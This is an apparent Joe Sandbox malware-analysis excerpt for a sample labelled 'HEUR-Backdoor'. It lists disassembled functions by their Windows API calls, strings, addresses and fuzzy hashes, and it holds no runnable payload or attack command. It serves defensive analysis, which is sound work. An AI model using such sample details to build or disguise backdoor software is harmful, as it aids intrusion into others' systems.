                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID:
                                                • API String ID: 2931989736-0
                                                • Opcode ID: 9a1533fb23bb72916b487e59294fa431163067f53b9725c31ec73ed71bfcd89d
                                                • Instruction ID: 12b59da4de65c9a947f552636804386589f22faa93fee948e89820191c0c35b1
                                                • Opcode Fuzzy Hash: 9a1533fb23bb72916b487e59294fa431163067f53b9725c31ec73ed71bfcd89d
                                                • Instruction Fuzzy Hash: 2921B27360124EBBDB049E12CC81E7BB7ADFB59784B148128FE09DB345E278ED5186A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32(?,00810EE8,007F3E14,00810EE8,?,?,007F3713,00000050,?,00810EE8,00000200), ref: 007F8FA9
                                                • _free.LIBCMT ref: 007F8FDC
                                                • _free.LIBCMT ref: 007F9004
                                                • SetLastError.KERNEL32(00000000,?,00810EE8,00000200), ref: 007F9011
                                                • SetLastError.KERNEL32(00000000,?,00810EE8,00000200), ref: 007F901D
                                                • _abort.LIBCMT ref: 007F9023
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free$_abort
                                                • String ID:
                                                • API String ID: 3160817290-0
                                                • Opcode ID: 17de80597e6d935ca28f81532a3b49328a55927adbf8ee6601dcea3c65304ef3
                                                • Instruction ID: e72f784443388db63a3126a6f82fe8e6a65ce3a924544f0dadbdcea4b72ea98e
                                                • Opcode Fuzzy Hash: 17de80597e6d935ca28f81532a3b49328a55927adbf8ee6601dcea3c65304ef3
                                                • Instruction Fuzzy Hash: DAF0F436505A09EBC7E133246C0EB3B295AABD1770F240114F724D2392EE2C89025416
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 007ED2F2
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007ED30C
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007ED31D
                                                • TranslateMessage.USER32(?), ref: 007ED327
                                                • DispatchMessageW.USER32(?), ref: 007ED331
                                                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 007ED33C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                • String ID:
                                                • API String ID: 2148572870-0
                                                • Opcode ID: 5430a53c7a7932a029180c17bb3b27477ea578cab04cf35e42d393d4c781c07b
                                                • Instruction ID: 320d21c6393994b79cbdb6b5fbf1ca56afb0c5eb9b6d6ad0eacc468129d26021
                                                • Opcode Fuzzy Hash: 5430a53c7a7932a029180c17bb3b27477ea578cab04cf35e42d393d4c781c07b
                                                • Instruction Fuzzy Hash: 0FF03C72A02519ABCB206BA2DC4CEDBBF6DFF96391F008412F606D2010D6388945CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _wcschr.LIBVCRUNTIME ref: 007EC435
                                                  • Part of subcall function 007E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,007DBB05,00000000,.exe,?,?,00000800,?,?,007E85DF,?), ref: 007E17C2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CompareString_wcschr
                                                • String ID: <$HIDE$MAX$MIN
                                                • API String ID: 2548945186-3358265660
                                                • Opcode ID: 432cde1fea814ffe382b128f79fd4047c004b06d89ee2fab21e045d8ccc55e63
                                                • Instruction ID: df32b045ab1ce0ff8be6731e0bd763cf0389222fd1710a8e38318d8f250bcb88
                                                • Opcode Fuzzy Hash: 432cde1fea814ffe382b128f79fd4047c004b06d89ee2fab21e045d8ccc55e63
                                                • Instruction Fuzzy Hash: 1331967690128DAADF26DA56CC45EEF77BCEB19700F004066FA05D6190EBB89FC5CA50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadBitmapW.USER32(00000065), ref: 007EADFD
                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 007EAE22
                                                • DeleteObject.GDI32(00000000), ref: 007EAE54
                                                • DeleteObject.GDI32(00000000), ref: 007EAE77
                                                  • Part of subcall function 007E9E1C: FindResourceW.KERNEL32(007EAE4D,PNG,?,?,?,007EAE4D,00000066), ref: 007E9E2E
                                                  • Part of subcall function 007E9E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,007EAE4D,00000066), ref: 007E9E46
                                                  • Part of subcall function 007E9E1C: LoadResource.KERNEL32(00000000,?,?,?,007EAE4D,00000066), ref: 007E9E59
                                                  • Part of subcall function 007E9E1C: LockResource.KERNEL32(00000000,?,?,?,007EAE4D,00000066), ref: 007E9E64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                • String ID: ]
                                                • API String ID: 142272564-3352871620
                                                • Opcode ID: a512763a23251290438f05ff499f449fa77478ee25db4951833dab1ad9142d4d
                                                • Instruction ID: c08ed9ffc8f7ff452577c713b0d0edceed1e11639f8c478c055a0cdd2f61f8a1
                                                • Opcode Fuzzy Hash: a512763a23251290438f05ff499f449fa77478ee25db4951833dab1ad9142d4d
                                                • Instruction Fuzzy Hash: F00126335426A5F7C710A7669C1BABF7B79AFC9B41F080014FE00A7291DB398C1586B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007D130B: GetDlgItem.USER32(00000000,00003021), ref: 007D134F
                                                  • Part of subcall function 007D130B: SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365
                                                • EndDialog.USER32(?,00000001), ref: 007ECCDB
                                                • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 007ECCF1
                                                • SetDlgItemTextW.USER32(?,00000066,?), ref: 007ECD05
                                                • SetDlgItemTextW.USER32(?,00000068), ref: 007ECD14
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ItemText$DialogWindow
                                                • String ID: RENAMEDLG
                                                • API String ID: 445417207-3299779563
                                                • Opcode ID: dc977c5e3a5354f143f0d918298d10908074077820c36b9b4beec4a47c22b622
                                                • Instruction ID: def07a5466a7479fbbc382aa11a3c8caea29340420a9c92f18f5ad125a87909d
                                                • Opcode Fuzzy Hash: dc977c5e3a5354f143f0d918298d10908074077820c36b9b4beec4a47c22b622
                                                • Instruction Fuzzy Hash: 3A012832386350BAD1229F659D09FAB3B6CFB9E742F204411F345A21E0C66AA9168B75
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,007F7573,00000000,?,007F7513,00000000,0080BAD8,0000000C,007F766A,00000000,00000002), ref: 007F75E2
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007F75F5
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,007F7573,00000000,?,007F7513,00000000,0080BAD8,0000000C,007F766A,00000000,00000002), ref: 007F7618
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 5517d1792a7c8690e3a871e7c5b98a2859e70b7c157f7fe5b375047ab56d3f71
                                                • Instruction ID: a7eff8e53f208c0088268a496a489d1cdd1f188418c3f98371fa38ab2df6513e
                                                • Opcode Fuzzy Hash: 5517d1792a7c8690e3a871e7c5b98a2859e70b7c157f7fe5b375047ab56d3f71
                                                • Instruction Fuzzy Hash: 62F0313060961DBBDB559B55DC09AAEBBB9FF04712F104058F805E2260DF788A40CA54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007E00A0
                                                  • Part of subcall function 007E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007DEB86,Crypt32.dll,00000000,007DEC0A,?,?,007DEBEC,?,?,?), ref: 007E00C2
                                                • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 007DEB92
                                                • GetProcAddress.KERNEL32(008181C0,CryptUnprotectMemory), ref: 007DEBA2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                • API String ID: 2141747552-1753850145
                                                • Opcode ID: be9745f881d4101f5a6f4e6a523cdc7c2c51763e720d4fb81f4c9565982cbeb5
                                                • Instruction ID: a45557ffd764026e721244ba2cd92b9bfa82457b9ce2a0de27d23a329d06e303
                                                • Opcode Fuzzy Hash: be9745f881d4101f5a6f4e6a523cdc7c2c51763e720d4fb81f4c9565982cbeb5
                                                • Instruction Fuzzy Hash: 79E04F70401741AEDB629F399D08B42BEE8BF15704F00881EE4E6D7380D6F8D5808B60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: bc9335ea65a5bd02cfbc64b0614dd28500ab9fccc793db824fe54762f8e54279
                                                • Instruction ID: e01ff69d988f32f405cdc6a8a87b7a0864f5d6ca1fb849660390a54816a129ab
                                                • Opcode Fuzzy Hash: bc9335ea65a5bd02cfbc64b0614dd28500ab9fccc793db824fe54762f8e54279
                                                • Instruction Fuzzy Hash: 8A41D232A00308DFCB28DF78C885A6EB7A5FF89714F1545A9E615EB351DB35AD01CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,007F895F,007F85FB,?,007F8FD3,00000001,00000364,?,007F3713,00000050,?,00810EE8,00000200), ref: 007F902E
                                                • _free.LIBCMT ref: 007F9063
                                                • _free.LIBCMT ref: 007F908A
                                                • SetLastError.KERNEL32(00000000,?,00810EE8,00000200), ref: 007F9097
                                                • SetLastError.KERNEL32(00000000,?,00810EE8,00000200), ref: 007F90A0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID:
                                                • API String ID: 3170660625-0
                                                • Opcode ID: 477b04f646072e427ef754c95c0a5b77f8646cc48748f454798e9240826f5bea
                                                • Instruction ID: 46c65a08872e2b9f45eaba2fbff35b6108297eba7cb67edd9d874518b3b00cc0
                                                • Opcode Fuzzy Hash: 477b04f646072e427ef754c95c0a5b77f8646cc48748f454798e9240826f5bea
                                                • Instruction Fuzzy Hash: 3501F472605A0AABD37267356C89B3B261DBBD07717240024F719D2352EF6C8C014161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007E0A41: ResetEvent.KERNEL32(?), ref: 007E0A53
                                                  • Part of subcall function 007E0A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 007E0A67
                                                • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 007E078F
                                                • CloseHandle.KERNEL32(?,?), ref: 007E07A9
                                                • DeleteCriticalSection.KERNEL32(?), ref: 007E07C2
                                                • CloseHandle.KERNEL32(?), ref: 007E07CE
                                                • CloseHandle.KERNEL32(?), ref: 007E07DA
                                                  • Part of subcall function 007E084E: WaitForSingleObject.KERNEL32(?,000000FF,007E0A78,?), ref: 007E0854
                                                  • Part of subcall function 007E084E: GetLastError.KERNEL32(?), ref: 007E0860
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                • String ID:
                                                • API String ID: 1868215902-0
                                                • Opcode ID: d58bc2b223e3bcc63af0d454195868dbecd8cc9f3ef2b5675d6f392aa44b42a1
                                                • Instruction ID: d37bee8c2e939174ddb96fe05599e91ed9dc3e90f01a8842183e1380a66ba874
                                                • Opcode Fuzzy Hash: d58bc2b223e3bcc63af0d454195868dbecd8cc9f3ef2b5675d6f392aa44b42a1
                                                • Instruction Fuzzy Hash: 7001B571441B44EFCB229B65DC88FC6BBEDFB49710F004529F15A82160CBB56A44CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 007FBF28
                                                  • Part of subcall function 007F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?), ref: 007F84F4
                                                  • Part of subcall function 007F84DE: GetLastError.KERNEL32(?,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?,?), ref: 007F8506
                                                • _free.LIBCMT ref: 007FBF3A
                                                • _free.LIBCMT ref: 007FBF4C
                                                • _free.LIBCMT ref: 007FBF5E
                                                • _free.LIBCMT ref: 007FBF70
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 534cf692aa93dd10a5c6357b5432697d800278d00ab1b23f0a37a2a935d91a24
                                                • Instruction ID: 26e9412d417fdab8e26a671c34cc08375a5c5dde34b872e9a39614bd62517141
                                                • Opcode Fuzzy Hash: 534cf692aa93dd10a5c6357b5432697d800278d00ab1b23f0a37a2a935d91a24
                                                • Instruction Fuzzy Hash: 53F0FF3350924DE7C6A0EF68EE8AD3773D9FA047107644C09F609D7A10CB28FC808A55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 007F807E
                                                  • Part of subcall function 007F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?), ref: 007F84F4
                                                  • Part of subcall function 007F84DE: GetLastError.KERNEL32(?,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?,?), ref: 007F8506
                                                • _free.LIBCMT ref: 007F8090
                                                • _free.LIBCMT ref: 007F80A3
                                                • _free.LIBCMT ref: 007F80B4
                                                • _free.LIBCMT ref: 007F80C5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 306ba693f2efc52f3a023301a4cccba2a25c7bb4ccf1093f8394f17e74459972
                                                • Instruction ID: 29924cdddef888e72cdd0f44a06713f42578cab5b804fb6f7e64ae0008533d71
                                                • Opcode Fuzzy Hash: 306ba693f2efc52f3a023301a4cccba2a25c7bb4ccf1093f8394f17e74459972
                                                • Instruction Fuzzy Hash: 58F03AB6805169CBCBD1AF59FC0A4273B65F764B203084E0AFA0097B70DF3908519FC2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007D7579
                                                  • Part of subcall function 007D3B3D: __EH_prolog.LIBCMT ref: 007D3B42
                                                • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 007D7640
                                                  • Part of subcall function 007D7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 007D7C04
                                                  • Part of subcall function 007D7BF5: GetLastError.KERNEL32 ref: 007D7C4A
                                                  • Part of subcall function 007D7BF5: CloseHandle.KERNEL32(?), ref: 007D7C59
                                                Strings
                                                Memory Dump Source
